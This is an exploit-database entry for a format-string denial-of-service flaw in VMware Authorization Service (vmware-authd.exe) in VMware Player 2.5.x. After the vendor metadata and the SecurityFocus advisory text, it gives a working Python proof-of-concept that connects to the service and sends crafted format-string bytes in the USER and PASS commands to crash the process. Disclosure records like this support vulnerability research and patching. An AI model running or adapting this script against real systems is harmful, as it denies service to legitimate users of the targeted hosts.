VMware Authorization Service

vendor:

VMware Player

by:

shinnai

7.5

CVSS

HIGH

Format String DoS

134

CWE

Product Name: VMware Player

Affected Version From: 2.5.2003

Affected Version To: 2.5.2003

Patch Exists: YES

Related CWE: N/A

CPE: a:vmware:vmware_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Professional Ita SP3

2010

VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS

VMware Player and Workstation are prone to a remote denial-of-service vulnerability because the applications fail to perform adequate validation checks on user-supplied input. An attacker can exploit this issue to crash the 'vmware-authd' process, denying service to legitimate users.

Mitigation:

Ensure that user-supplied input is properly validated.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/36630/info

VMware Player and Workstation are prone to a remote denial-of-service vulnerability because the applications fail to perform adequate validation checks on user-supplied input.

An attacker can exploit this issue to crash the 'vmware-authd' process, denying service to legitimate users.

NOTE: This issue was also covered in BID 39345 (VMware Hosted Products VMSA-2010-0007 Multiple Remote and Local Vulnerabilities); this BID is being retained to properly document the issue.

# ----------------------------------------------------------------------------
# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS
# url: http://www.vmware.com/
#
# author: shinnai
# mail: shinnai[at]autistici[dot]org
# site: http://www.shinnai.net
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Tested on Windows XP Professional Ita SP3 full patched
# ----------------------------------------------------------------------------

# usage: C:\>exploit.py 127.0.0.1 912

import socket
import time
import sys

host = str(sys.argv[1])
port = int(sys.argv[2])

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    conn = s.connect((host, port))
    d = s.recv(1024)
    print "Server <- " + d

    s.send('USER \x25\xFF \r\n')
    print 'Sending command "USER" + evil string...'
    d = s.recv(1024)
    print "Server response <- " + d

    s.send('PASS \x25\xFF \r\n')
    print 'Sending command "PASS" + evil string...'
    try:
        d = s.recv(1024)
        print "Server response <- " + d
    except:
        print "\nExploit completed..."
except:
    print "Something goes wrong honey..."